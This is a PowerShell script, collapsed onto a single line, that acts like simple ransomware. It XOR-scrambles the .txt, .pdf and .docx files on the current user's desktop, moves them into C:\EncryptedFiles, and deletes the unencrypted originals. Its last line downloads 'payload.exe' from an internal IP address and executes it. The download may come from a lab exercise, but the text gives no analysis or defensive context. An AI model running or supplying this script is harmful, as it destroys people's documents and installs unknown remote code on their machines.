# PowerShell script to encrypt .txt, .pdf, and .docx files on the desktop and move them to EncryptedFiles directory # Browse to the desktop Set-Location -Path "$env:USERPROFILE\Desktop" # Specify the output directory for the encrypted files $outputDirectory = 'C:\EncryptedFiles\' # Create the output directory if it doesn't exist New-Item -ItemType Directory -Path $outputDirectory -ErrorAction SilentlyContinue # Specify your encryption key as a byte array (8 bits for XOR encryption) $xorEncryptionKey = 0xFF # Function to encrypt content using XOR encryption Function Encrypt-Content { param( [byte[]] $contentBytes, [byte] $xorKey ) $encryptedContentBytes = $contentBytes | ForEach-Object { $_ -bxor $xorKey } return $encryptedContentBytes } # Encrypt .txt, .pdf, and .docx files $txtFiles = Get-ChildItem -Path . -Filter *.txt $pdfFiles = Get-ChildItem -Path . -Filter *.pdf $docxFiles = Get-ChildItem -Path . -Filter *.docx foreach ($file in $txtFiles) { $inputFilePath = $file.FullName $outputFilePath = Join-Path -Path $outputDirectory -ChildPath ('Encrypted_' + $file.Name) # Ensure inputFilePath and outputFilePath are not null or empty if (![string]::IsNullOrWhiteSpace($inputFilePath) -and ![string]::IsNullOrWhiteSpace($outputFilePath)) { # Read the content of the file $contentBytes = [System.IO.File]::ReadAllBytes($inputFilePath) # Encrypt the content using XOR $encryptedContentBytes = Encrypt-Content -contentBytes $contentBytes -xorKey $xorEncryptionKey # Write the encrypted content to the output file [System.IO.File]::WriteAllBytes($outputFilePath, $encryptedContentBytes) # Move the encrypted file to the EncryptedFiles directory Move-Item -Path $inputFilePath -Destination $outputDirectory } else { Write-Output 'File paths are null or empty. Skipping encryption for this file.' } } foreach ($file in $pdfFiles) { $inputFilePath = $file.FullName $outputFilePath = Join-Path -Path $outputDirectory -ChildPath ('Encrypted_' + $file.Name) # Ensure inputFilePath and outputFilePath are not null or empty if (![string]::IsNullOrWhiteSpace($inputFilePath) -and ![string]::IsNullOrWhiteSpace($outputFilePath)) { # Read the content of the file $contentBytes = [System.IO.File]::ReadAllBytes($inputFilePath) # Encrypt the content using XOR $encryptedContentBytes = Encrypt-Content -contentBytes $contentBytes -xorKey $xorEncryptionKey # Write the encrypted content to the output file [System.IO.File]::WriteAllBytes($outputFilePath, $encryptedContentBytes) # Move the encrypted file to the EncryptedFiles directory Move-Item -Path $inputFilePath -Destination $outputDirectory } else { Write-Output 'File paths are null or empty. Skipping encryption for this file.' } } foreach ($file in $docxFiles) { $inputFilePath = $file.FullName $outputFilePath = Join-Path -Path $outputDirectory -ChildPath ('Encrypted_' + $file.Name) # Ensure inputFilePath and outputFilePath are not null or empty if (![string]::IsNullOrWhiteSpace($inputFilePath) -and ![string]::IsNullOrWhiteSpace($outputFilePath)) { # Read the content of the file $contentBytes = [System.IO.File]::ReadAllBytes($inputFilePath) # Encrypt the content using XOR $encryptedContentBytes = Encrypt-Content -contentBytes $contentBytes -xorKey $xorEncryptionKey # Write the encrypted content to the output file [System.IO.File]::WriteAllBytes($outputFilePath, $encryptedContentBytes) # Move the encrypted file to the EncryptedFiles directory Move-Item -Path $inputFilePath -Destination $outputDirectory } else { Write-Output 'File paths are null or empty. Skipping encryption for this file.' } } Write-Output 'Files encrypted and moved to EncryptedFiles directory.' Get-ChildItem -Path $outputDirectory | Where-Object { $_.Name -notmatch 'Encrypted' } | Remove-Item powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://10.0.10.10/payload.exe' -OutFile 'C:\file.exe'; C:\file.exe"